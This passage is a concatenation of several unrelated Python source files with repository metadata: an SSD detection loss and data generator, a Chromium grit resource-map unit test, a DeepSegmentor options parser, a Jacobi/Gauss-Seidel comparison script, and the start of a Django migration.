max_confs = tf.reduce_max(y_pred[:, :, confs_start:confs_end],
axis=2)
# 取top_k个置信度,作为负样本
_, indices = tf.nn.top_k(max_confs * (1 - y_true[:, :, -8]),
k=num_neg_batch)
# 找到其在1维上的索引
batch_idx = tf.expand_dims(tf.range(0, batch_size), 1)
batch_idx = tf.tile(batch_idx, (1, num_neg_batch))
full_indices = (tf.reshape(batch_idx, [-1]) * tf.cast(num_boxes, tf.int32) +
tf.reshape(indices, [-1]))
# full_indices = tf.concat(2, [tf.expand_dims(batch_idx, 2),
# tf.expand_dims(indices, 2)])
# neg_conf_loss = tf.gather_nd(conf_loss, full_indices)
neg_conf_loss = tf.gather(tf.reshape(conf_loss, [-1]),
full_indices)
neg_conf_loss = tf.reshape(neg_conf_loss,
[batch_size, num_neg_batch])
neg_conf_loss = tf.reduce_sum(neg_conf_loss, axis=1)
# loss is sum of positives and negatives
num_pos = tf.where(tf.not_equal(num_pos, 0), num_pos,
tf.ones_like(num_pos))
total_loss = tf.reduce_sum(pos_conf_loss) + tf.reduce_sum(neg_conf_loss)
total_loss /= tf.reduce_sum(num_pos)
total_loss += tf.reduce_sum(self.alpha * pos_loc_loss) / tf.reduce_sum(num_pos)
return total_loss
def rand(a=0, b=1):
return np.random.rand() * (b - a) + a
class Generator(object):
def __init__(self, bbox_util, batch_size,
train_lines, val_lines, image_size, num_classes,
):
self.bbox_util = bbox_util
self.batch_size = batch_size
self.train_lines = train_lines
self.val_lines = val_lines
self.train_batches = len(train_lines)
self.val_batches = len(val_lines)
self.image_size = image_size
self.num_classes = num_classes - 1
def get_random_data(self, annotation_line, input_shape, jitter=.3, hue=.1, sat=1.5, val=1.5):
'''r实时数据增强的随机预处理'''
line = annotation_line.split()
image = Image.open(line[0])
iw, ih = image.size
h, w = input_shape
box = np.array([np.array(list(map(int, box.split(',')))) for box in line[1:]])
# resize image
new_ar = w / h * rand(1 - jitter, 1 + jitter) / rand(1 - jitter, 1 + jitter)
scale = rand(.5, 1.5)
if new_ar < 1:
nh = int(scale * h)
nw = int(nh * new_ar)
else:
nw = int(scale * w)
nh = int(nw / new_ar)
image = image.resize((nw, nh), Image.BICUBIC)
# place image
dx = int(rand(0, w - nw))
dy = int(rand(0, h - nh))
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
flip = rand() < .5
if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand() < .5 else 1 / rand(1, sat)
val = rand(1, val) if rand() < .5 else 1 / rand(1, val)
x = cv2.cvtColor(np.array(image, np.float32) / 255, cv2.COLOR_RGB2HSV)
x[..., 0] += hue * 360
x[..., 0][x[..., 0] > 1] -= 1
x[..., 0][x[..., 0] < 0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x[:, :, 0] > 360, 0] = 360
x[:, :, 1:][x[:, :, 1:] > 1] = 1
x[x < 0] = 0
image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB) * 255
# correct boxes
box_data = np.zeros((len(box), 5))
if len(box) > 0:
np.random.shuffle(box)
box[:, [0, 2]] = box[:, [0, 2]] * nw / iw + dx
box[:, [1, 3]] = box[:, [1, 3]] * nh / ih + dy
if flip: box[:, [0, 2]] = w - box[:, [2, 0]]
box[:, 0:2][box[:, 0:2] < 0] = 0
box[:, 2][box[:, 2] > w] = w
box[:, 3][box[:, 3] > h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w > 1, box_h > 1)] # discard invalid box
box_data = np.zeros((len(box), 5))
box_data[:len(box)] = box
if len(box) == 0:
return image_data, []
if (box_data[:, :4] > 0).any():
return image_data, box_data
else:
return image_data, []
def generate(self, train=True):
while True:
if train:
# 打乱
shuffle(self.train_lines)
lines = self.train_lines
else:
shuffle(self.val_lines)
lines = self.val_lines
inputs = []
targets = []
for annotation_line in lines:
img, y = self.get_random_data(annotation_line, self.image_size[0:2])
if len(y) != 0:
boxes = np.array(y[:, :4], dtype=np.float32)
boxes[:, 0] = boxes[:, 0] / self.image_size[1]
boxes[:, 1] = boxes[:, 1] / self.image_size[0]
boxes[:, 2] = boxes[:, 2] / self.image_size[1]
boxes[:, 3] = boxes[:, 3] / self.image_size[0]
one_hot_label = np.eye(self.num_classes)[np.array(y[:, 4], np.int32)]
if ((boxes[:, 3] - boxes[:, 1]) <= 0).any() and ((boxes[:, 2] - boxes[:, 0]) <= 0).any():
continue
y = np.concatenate([boxes, one_hot_label], axis=-1)
y = self.bbox_util.assign_boxes(y)
inputs.append(img)
targets.append(y)
if len(targets) == self.batch_size:
tmp_inp = np.array(inputs)
tmp_targets = np.array(targets)
inputs = []
targets = []
yield preprocess_input(tmp_inp), tmp_targets
| [
"noreply@github.com"
] | noreply@github.com |
13a4e0a500494230f0b097836ef8e1748b2c0f01 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /tools/grit/grit/format/resource_map_unittest.py | ecc997a180675ab38dc887c768b9bb3b395cddb7 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-unknown",
"MIT"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 12,456 | py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for grit.format.resource_map'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import StringIO
import unittest
from grit import grd_reader
from grit import util
from grit.format import resource_map
class FormatResourceMapUnittest(unittest.TestCase):
def testFormatResourceMap(self):
grd = grd_reader.Parse(StringIO.StringIO(
'''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en" current_release="3"
base_dir=".">
<outputs>
<output type="rc_header" filename="the_rc_header.h" />
<output type="resource_map_header"
filename="the_resource_map_header.h" />
</outputs>
<release seq="3">
<structures first_id="300">
<structure type="menu" name="IDC_KLONKMENU"
file="grit\\testdata\\klonk.rc" encoding="utf-16" />
</structures>
<includes first_id="10000">
<include type="foo" file="abc" name="IDS_FIRSTPRESENT" />
<if expr="False">
<include type="foo" file="def" name="IDS_MISSING" />
</if>
<if expr="lang != 'es'">
<include type="foo" file="ghi" name="IDS_LANGUAGESPECIFIC" />
</if>
<if expr="lang == 'es'">
<include type="foo" file="jkl" name="IDS_LANGUAGESPECIFIC" />
</if>
<include type="foo" file="mno" name="IDS_THIRDPRESENT" />
</includes>
</release>
</grit>'''), util.PathFromRoot('.'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
const char* const name;
int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"IDC_KLONKMENU", IDC_KLONKMENU},
{"IDS_FIRSTPRESENT", IDS_FIRSTPRESENT},
{"IDS_MISSING", IDS_MISSING},
{"IDS_LANGUAGESPECIFIC", IDS_LANGUAGESPECIFIC},
{"IDS_THIRDPRESENT", IDS_THIRDPRESENT},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_file_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"grit/testdata/klonk.rc", IDC_KLONKMENU},
{"abc", IDS_FIRSTPRESENT},
{"def", IDS_MISSING},
{"ghi", IDS_LANGUAGESPECIFIC},
{"jkl", IDS_LANGUAGESPECIFIC},
{"mno", IDS_THIRDPRESENT},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
def testFormatResourceMapWithOutputAllEqualsFalseForStructures(self):
grd = grd_reader.Parse(StringIO.StringIO(
'''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en" current_release="3"
base_dir="." output_all_resource_defines="false">
<outputs>
<output type="rc_header" filename="the_rc_header.h" />
<output type="resource_map_header"
filename="the_resource_map_header.h" />
<output type="resource_map_source"
filename="the_resource_map_header.cc" />
</outputs>
<release seq="3">
<structures first_id="300">
<structure type="chrome_scaled_image" name="IDR_KLONKMENU"
file="foo.png" />
<if expr="False">
<structure type="chrome_scaled_image" name="IDR_MISSING"
file="bar.png" />
</if>
<if expr="True">
<structure type="chrome_scaled_image" name="IDR_BLOB"
file="blob.png" />
</if>
<if expr="True">
<then>
<structure type="chrome_scaled_image" name="IDR_METEOR"
file="meteor.png" />
</then>
<else>
<structure type="chrome_scaled_image" name="IDR_METEOR"
file="roetem.png" />
</else>
</if>
<if expr="False">
<structure type="chrome_scaled_image" name="IDR_LAST"
file="zyx.png" />
</if>
<if expr="True">
<structure type="chrome_scaled_image" name="IDR_LAST"
file="xyz.png" />
</if>
</structures>
</release>
</grit>'''), util.PathFromRoot('.'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
const char* const name;
int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"IDR_KLONKMENU", IDR_KLONKMENU},
{"IDR_BLOB", IDR_BLOB},
{"IDR_METEOR", IDR_METEOR},
{"IDR_LAST", IDR_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"IDR_KLONKMENU", IDR_KLONKMENU},
{"IDR_BLOB", IDR_BLOB},
{"IDR_METEOR", IDR_METEOR},
{"IDR_LAST", IDR_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
def testFormatResourceMapWithOutputAllEqualsFalseForIncludes(self):
grd = grd_reader.Parse(StringIO.StringIO(
'''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en" current_release="3"
base_dir="." output_all_resource_defines="false">
<outputs>
<output type="rc_header" filename="the_rc_header.h" />
<output type="resource_map_header"
filename="the_resource_map_header.h" />
</outputs>
<release seq="3">
<structures first_id="300">
<structure type="menu" name="IDC_KLONKMENU"
file="grit\\testdata\\klonk.rc" encoding="utf-16" />
</structures>
<includes first_id="10000">
<include type="foo" file="abc" name="IDS_FIRSTPRESENT" />
<if expr="False">
<include type="foo" file="def" name="IDS_MISSING" />
</if>
<include type="foo" file="mno" name="IDS_THIRDPRESENT" />
<if expr="True">
<include type="foo" file="blob" name="IDS_BLOB" />
</if>
<if expr="True">
<then>
<include type="foo" file="meteor" name="IDS_METEOR" />
</then>
<else>
<include type="foo" file="roetem" name="IDS_METEOR" />
</else>
</if>
<if expr="False">
<include type="foo" file="zyx" name="IDS_LAST" />
</if>
<if expr="True">
<include type="foo" file="xyz" name="IDS_LAST" />
</if>
</includes>
</release>
</grit>'''), util.PathFromRoot('.'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
const char* const name;
int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"IDC_KLONKMENU", IDC_KLONKMENU},
{"IDS_FIRSTPRESENT", IDS_FIRSTPRESENT},
{"IDS_THIRDPRESENT", IDS_THIRDPRESENT},
{"IDS_BLOB", IDS_BLOB},
{"IDS_METEOR", IDS_METEOR},
{"IDS_LAST", IDS_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_file_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_resource_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"grit/testdata/klonk.rc", IDC_KLONKMENU},
{"abc", IDS_FIRSTPRESENT},
{"mno", IDS_THIRDPRESENT},
{"blob", IDS_BLOB},
{"meteor", IDS_METEOR},
{"xyz", IDS_LAST},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
def testFormatStringResourceMap(self):
grd = grd_reader.Parse(StringIO.StringIO(
'''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en" current_release="3"
base_dir=".">
<outputs>
<output type="rc_header" filename="the_rc_header.h" />
<output type="resource_map_header" filename="the_rc_map_header.h" />
<output type="resource_map_source" filename="the_rc_map_source.cc" />
</outputs>
<release seq="1" allow_pseudo="false">
<messages fallback_to_english="true">
<message name="IDS_PRODUCT_NAME" desc="The application name">
Application
</message>
<if expr="True">
<message name="IDS_DEFAULT_TAB_TITLE_TITLE_CASE"
desc="In Title Case: The default title in a tab.">
New Tab
</message>
</if>
<if expr="False">
<message name="IDS_DEFAULT_TAB_TITLE"
desc="The default title in a tab.">
New tab
</message>
</if>
</messages>
</release>
</grit>'''), util.PathFromRoot('.'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_header')(grd, 'en', '.')))
self.assertEqual('''\
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
const char* const name;
int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap kTheRcHeader[];
extern const size_t kTheRcHeaderSize;''', output)
output = util.StripBlankLinesAndComments(''.join(
resource_map.GetFormatter('resource_map_source')(grd, 'en', '.')))
self.assertEqual('''\
#include "the_rc_map_header.h"
#include <stddef.h>
#include "base/macros.h"
#include "the_rc_header.h"
const GritResourceMap kTheRcHeader[] = {
{"IDS_PRODUCT_NAME", IDS_PRODUCT_NAME},
{"IDS_DEFAULT_TAB_TITLE_TITLE_CASE", IDS_DEFAULT_TAB_TITLE_TITLE_CASE},
};
const size_t kTheRcHeaderSize = arraysize(kTheRcHeader);''', output)
if __name__ == '__main__':
unittest.main()
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
a3a1325e2e8ccff98c1e3529142fb6286b980da2 | 575d590bf6a401f36f4bf7c48fa3710486082794 | /options/base_options.py | f5b36f86a575a71b5fc8a679c5f2c959126e999d | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | hanyeliu/DeepSegmentor | cb16ed50d8a6161ec2eefde3cf243dabf86349c4 | 422141001d554029853d3d5ca3a772eb459bf0ca | refs/heads/master | 2022-01-22T16:55:10.595828 | 2019-07-21T02:05:05 | 2019-07-21T02:05:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,752 | py | import argparse
import os
from util import util
import torch
import models
import data
class BaseOptions():
"""This class defines options used during both training and test time.
It also implements several helper functions such as parsing, printing, and saving the options.
It also gathers additional options defined in <modify_commandline_options> functions in both dataset class and model class.
"""
def __init__(self):
"""Reset the class; indicates the class hasn't been initailized"""
self.initialized = False
def initialize(self, parser):
"""Define the common options that are used in both training and test."""
# basic parameters
parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')
parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')
# model parameters
parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]')
parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale')
parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale')
parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')
parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')
parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')
parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]')
parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers')
parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]')
parser.add_argument('--init_type', type=str, default='xavier', help='network initialization [normal | xavier | kaiming | orthogonal]')
parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')
parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')
# dataset parameters
parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]')
parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')
parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')
parser.add_argument('--num_threads', default=2, type=int, help='# threads for loading data')
parser.add_argument('--batch_size', type=int, default=1, help='input batch size')
parser.add_argument('--load_size', type=int, default=286, help='scale images to this size')
parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size')
parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')
parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')
parser.add_argument('--no_flip', type=int, default=1, help='if specified, do not flip the images for data augmentation')
parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML')
# additional parameters
parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')
parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')
parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')
parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')
# for deepcrack
parser.add_argument('--load_width', type=int, default=0, help='load image width')
parser.add_argument('--load_height', type=int, default=0, help='load image height')
parser.add_argument('--use_augment', type=int, default=1, help='using data augmentation for training')
parser.add_argument('--display_sides', type=int, default=1, help='displaying the side output results')
parser.add_argument('--num_classes', type=int, default=2, help='number of classes')
#parser.add_argument('--use_l1', type=int, default=1, help='using l1 loss')
parser.add_argument('--use_selu', type=int, default=1, help='using selu active function')
self.initialized = True
return parser
def gather_options(self):
"""Initialize our parser with basic options(only once).
Add additional model-specific and dataset-specific options.
These options are difined in the <modify_commandline_options> function
in model and dataset classes.
"""
if not self.initialized: # check if it has been initialized
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser = self.initialize(parser)
# get the basic options
opt, _ = parser.parse_known_args()
# modify model-related parser options
model_name = opt.model
model_option_setter = models.get_option_setter(model_name)
parser = model_option_setter(parser, self.isTrain)
opt, _ = parser.parse_known_args() # parse again with new defaults
# modify dataset-related parser options
dataset_name = opt.dataset_mode
dataset_option_setter = data.get_option_setter(dataset_name)
parser = dataset_option_setter(parser, self.isTrain)
# save and return the parser
self.parser = parser
return parser.parse_args()
def print_options(self, opt):
"""Print and save options
It will print both current options and default values(if different).
It will save options into a text file / [checkpoints_dir] / opt.txt
"""
message = ''
message += '----------------- Options ---------------\n'
for k, v in sorted(vars(opt).items()):
comment = ''
default = self.parser.get_default(k)
if v != default:
comment = '\t[default: %s]' % str(default)
message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
print(message)
# save to the disk
expr_dir = os.path.join(opt.checkpoints_dir, opt.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write(message)
opt_file.write('\n')
def parse(self):
"""Parse our options, create checkpoints directory suffix, and set up gpu device."""
opt = self.gather_options()
opt.isTrain = self.isTrain # train or test
# process opt.suffix
if opt.suffix:
suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else ''
opt.name = opt.name + suffix
self.print_options(opt)
# set gpu ids
str_ids = opt.gpu_ids.split(',')
opt.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
opt.gpu_ids.append(id)
if len(opt.gpu_ids) > 0:
torch.cuda.set_device(opt.gpu_ids[0])
self.opt = opt
return self.opt
| [
"yahui.cvrs@gmail.com"
] | yahui.cvrs@gmail.com |
8e3a3245eb53935b2ac1edf402a6fd0c933c6cf8 | 34489df05574af972e7e385ecb5b7b39f071f8dd | /main.py | 149c0605279f681074992309dae11cf90ad86be2 | [] | no_license | makc2099/Comp.methods4 | f4f39d1bc4571ebb5e0c14c3bd6fb04598fd2a67 | 9ffcfc34564b627168915d710958f823ab82c2aa | refs/heads/master | 2023-08-16T13:41:31.059500 | 2021-10-18T15:38:58 | 2021-10-18T15:38:58 | 417,944,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,092 | py | import numpy as np
from tabulate import tabulate
def iteration(alpha, beta, x, eps):
k=1
err = eps + 1
while err > eps and k < 500:
err = np.linalg.norm(np.dot(alpha, x) + beta - x)
x = np.dot(alpha, x) + beta
k += 1
x = np.dot(alpha, x) + beta
return x, k
def zeidel(A, b, eps):
k = 0
x = np.array(np.zeros((b.shape[0])))
err = eps + 1
while err > eps:
x_new = x.copy()
for i in range(A.shape[0]):
x1 = sum(A[i][j] * x_new[j] for j in range(i))
x2 = sum(A[i][j] * x[j] for j in range(i + 1, A.shape[0]))
x_new[i] = (b[i] - x1 - x2)/A[i][i]
err = np.linalg.norm(x_new - x)
k += 1
x = x_new
return x, k
def calculate_alpha_beta(A, b):
alpha = np.array(np.zeros((A.shape[0], A.shape[0])))
beta = np.array(np.zeros(b.shape[0]))
for i in range(A.shape[0]):
for j in range(A.shape[0]):
if i != j:
alpha[i][j] = - A[i][j] / A[i][i]
beta[i] = b[i] / A[i][i]
else:
alpha[i][i] = 0
return alpha, beta
def iter_form(A):
n = A.shape[0]
for i in range(n):
for j in range(n):
A[i][j] = 1 / (i + 1 + j + 1 - 1)
return A
A2 = np.array([[1, 1 / 2,],
[1 / 2, 1 / 3]],dtype=float)
A3 = np.array([[1, 1 / 2, 1 / 3, ],
[1 / 2, 1 / 3, 1 / 4],
[1 / 3, 1 / 4, 1 / 5]],dtype=float)
A4 = np.array([[-500.7, 120.7],
[ 890.3, -550.6]],dtype=float)
x2 = np.random.uniform(0, 100, size=A2.shape[0])
x4 = np.random.uniform(0, 100, size=A4.shape[0])
x3 = np.random.uniform(0, 100, size=A3.shape[0])
p_A2=A2
p_A3=A3
p_A4=A4
A2 = iter_form(A2)
A4 = iter_form(A4)
A3 = iter_form(A3)
b2 = np.dot(A2,x2)
b4 = np.dot(A4,x4)
b3 = np.dot(A3,x3)
alpha2, beta2 = calculate_alpha_beta(A2, b2)
alpha4, beta4 = calculate_alpha_beta(A4, b4)
alpha3, beta3 = calculate_alpha_beta(A3, b3)
print(p_A4)
print(tabulate([[10**(-5),iteration(alpha4, beta4, beta4, 10**(-5))[1],zeidel(A4, b4,10**(-5))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-5))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-5))[0])],
[10**(-8),iteration(alpha4, beta4, beta4, 10**(-8))[1],zeidel(A4, b4,10**(-8))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-8))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-8))[0])],
[10**(-11),iteration(alpha4, beta4, beta4, 10**(-11))[1],zeidel(A4, b4,10**(-11))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-11))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-11))[0])],
[10**(-14),iteration(alpha4, beta4, beta4, 10**(-14))[1],zeidel(A4, b4,10**(-14))[1],np.linalg.norm(x4 - iteration(alpha4, beta4, beta4, 10**(-14))[0]),np.linalg.norm(x4 - zeidel(A4, b4, 10**(-14))[0])]], headers=['Погрешность','#Итерации простого','#Итерации Зейделя','|x-x_pr|','|x-x_zei|'],tablefmt='orgtbl'))
print(p_A3)
print(tabulate([[10**(-5),iteration(alpha3, beta3, beta3, 10**(-5))[1],zeidel(A3, b3,10**(-5))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-5))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-5))[0])],
[10**(-8),iteration(alpha3, beta3, beta3, 10**(-8))[1],zeidel(A3, b3,10**(-8))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-8))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-8))[0])],
[10**(-11),iteration(alpha3, beta3, beta3, 10**(-11))[1],zeidel(A3, b3,10**(-11))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-11))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-11))[0])],
[10**(-14),iteration(alpha3, beta3, beta3, 10**(-14))[1],zeidel(A3, b3,10**(-14))[1],np.linalg.norm(x3 - iteration(alpha3, beta3, beta3, 10**(-14))[0]),np.linalg.norm(x3 - zeidel(A3, b3, 10**(-14))[0])]], headers=['Погрешность','#Итерации простого','#Итерации Зейделя','|x-x_pr|','|x-x_zei|'],tablefmt='orgtbl'))
print(p_A2)
print(tabulate([[10**(-5),iteration(alpha2, beta2, beta2, 10**(-5))[1],zeidel(A2, b2,10**(-5))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-5))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-5))[0])],
[10**(-8),iteration(alpha2, beta2, beta2, 10**(-8))[1],zeidel(A2, b2,10**(-8))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-8))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-8))[0])],
[10**(-11),iteration(alpha2, beta2, beta2, 10**(-11))[1],zeidel(A2, b2,10**(-11))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-11))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-11))[0])],
[10**(-14),iteration(alpha2, beta2, beta2, 10**(-14))[1],zeidel(A2, b2,10**(-14))[1],np.linalg.norm(x2 - iteration(alpha2, beta2, beta2, 10**(-14))[0]),np.linalg.norm(x2 - zeidel(A2, b2, 10**(-14))[0])]], headers=['Погрешность','#Итерации простого','#Итерации Зейделя','|x-x_pr|','|x-x_zei|'],tablefmt='orgtbl'))
| [
"makc2099@yandex.ru"
] | makc2099@yandex.ru |
9b80d82c0f685c41a834444780cd8207ebb71348 | 9f9b19a26ed931207878364d395e47a3d986751b | /dmam/migrations/0006_auto_20181022_2230.py | 6b6b882350caefc90a3b9690311255482d54076e | [] | no_license | lishulincug/waterwork | 6697f5264dc880a92d9b91e91b703eda3818d7a3 | 690fb344e7f271a3ded66f0cdf4c9161811ed1f4 | refs/heads/master | 2020-09-09T13:19:21.301200 | 2019-07-25T09:37:04 | 2019-07-25T09:37:04 | 221,456,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # Generated by Django 2.0 on 2018-10-22 22:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dmam', '0005_auto_20181022_1555'),
]
operations = [
